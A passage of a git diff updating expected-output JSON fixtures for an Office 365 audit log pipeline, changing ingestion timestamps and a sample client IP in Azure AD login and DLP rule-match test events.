@@ -9302,25 +8090,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9334,7 +8104,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -9384,7 +8154,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -9396,12 +8166,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051737400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970447700Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:39\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"3c439e46-d454-4767-9320-1e75540821b7\",\"InterSystemsId\":\"fc5c6c90-a6ba-486c-b685-8d67c529d3aa\",\"IntraSystemId\":\"6e184f6f-887b-4410-b24d-723031366000\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json index 0354164eb64..a4d621ba4f6 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json 
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-data-insights-api-events.json-expected.json @@ -25,7 +25,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565197300Z", + "ingested": "2021-12-09T13:42:28.698290600Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -72,7 +72,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565211Z", + "ingested": "2021-12-09T13:42:28.698300600Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", 
@@ -119,7 +119,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565214500Z", + "ingested": "2021-12-09T13:42:28.698306900Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -166,7 +166,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565217700Z", + "ingested": "2021-12-09T13:42:28.698312900Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -213,7 +213,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565220200Z", + "ingested": "2021-12-09T13:42:28.698318900Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", 
@@ -260,7 +260,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565222500Z", + "ingested": "2021-12-09T13:42:28.698324800Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -307,7 +307,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565225500Z", + "ingested": "2021-12-09T13:42:28.698330800Z", "original": "{\"CreationTime\":\"2020-02-10T15:13:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"20a7bbcf-8e64-4e60-b075-08d7ae3bcea0\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", @@ -354,7 +354,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565228Z", + "ingested": "2021-12-09T13:42:28.698336700Z", "original": "{\"CreationTime\":\"2020-02-12T10:53:26\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"3b492d08-23a8-4e65-75ea-08d7afa9c9a2\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", 
@@ -401,7 +401,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:49.565230700Z", + "ingested": "2021-12-09T13:42:28.698342600Z", "original": "{\"CreationTime\":\"2020-02-12T21:38:38\",\"DataType\":\"DataInsightsSubscription\",\"Id\":\"0ff67168-de8c-45fb-3f7d-08d7b003ebdc\",\"Operation\":\"SearchDataInsightsSubscription\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":52,\"UserId\":\"Service Account\",\"UserKey\":\"Service Account\",\"UserType\":5,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "DataInsightsRestApiAudit", "provider": "SecurityComplianceCenter", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json index 990abcaf1b9..410b3afce36 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-exchange-events.json-expected.json 
@@ -151,7 +151,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.722942900Z", + "ingested": "2021-12-09T13:42:29.292337500Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected 
test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -323,7 +323,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.722958300Z", + "ingested": "2021-12-09T13:42:29.292347200Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleUndo\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected 
test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -498,7 +498,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.722961900Z", + "ingested": "2021-12-09T13:42:29.292353800Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExceptionInfo\":\"{ \\\"Justification\\\": \\\"I really need to share those files\\\" }\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected 
test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -673,7 +673,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.722964700Z", + "ingested": "2021-12-09T13:42:29.292360200Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExceptionInfo\":{\"FalsePositive\":true},\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13405,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"d5a0e7d9-e06f-498c-8413-eb83b7dbd516\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-e159-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected 
test\",\"Severity\":\"High\"},{\"ActionParameters\":[\"GenerateIncidentReport:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"51e3d97a-1234-4645-9092-608bd24e083a\",\"RuleMode\":\"Enable\",\"RuleName\":\"Mid volume of content detected test\",\"Severity\":\"Medium\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -800,7 +800,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-17T07:32:49.722967300Z", + "ingested": "2021-12-09T13:42:29.292366400Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"ExchangeMetaData\":{\"BCC\":[],\"CC\":[\"asr@example.net\"],\"FileSize\":13310,\"From\":\"asr@testsiem2.onmicrosoft.com\",\"MessageID\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"RecipientCount\":2,\"Sent\":\"2020-02-24T20:11:14\",\"Subject\":\"Here's the phony data\",\"To\":[\"asr@example.org\"],\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\"},\"Id\":\"a42123a9-1c07-4dde-9be6-ac71cb9fd16b\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"8398c03a-a00d-42bb-8f80-ead0ad04e1df\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected test\",\"Severity\":\"Low\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
@@ -918,7 +918,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-17T07:32:49.722969900Z", + "ingested": "2021-12-09T13:42:29.292372700Z", "original": "{\"CreationTime\":\"2020-02-24T20:11:15\",\"Id\":\"a42123a9-1c07-4dde-9be6-ac71cb9fd16b\",\"IncidentId\":\"c1dc582b-fa61-6020-1800-08d7b966ec64\",\"ObjectId\":\"\\u003cAM0PR05MB4803CDA6206C2F2FEB36DB5AB8EC0@AM0PR05MB4803.eurprd05.prod.outlook.com\\u003e\",\"Operation\":\"DlpRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"88956b36-45b3-4828-bf53-78603c0e5f58\",\"PolicyName\":\"test\",\"Rules\":[{\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"OtherConditions\":[{\"Name\":\"AccessScope\",\"Value\":\"IncludeExternalUsers\"}],\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"Location\":\"Message Body\",\"SensitiveType\":\"419f449f-6d9d-4be1-a154-b531f7a91b41\",\"UniqueCount\":1},{\"Confidence\":75,\"Count\":1,\"Location\":\"Message 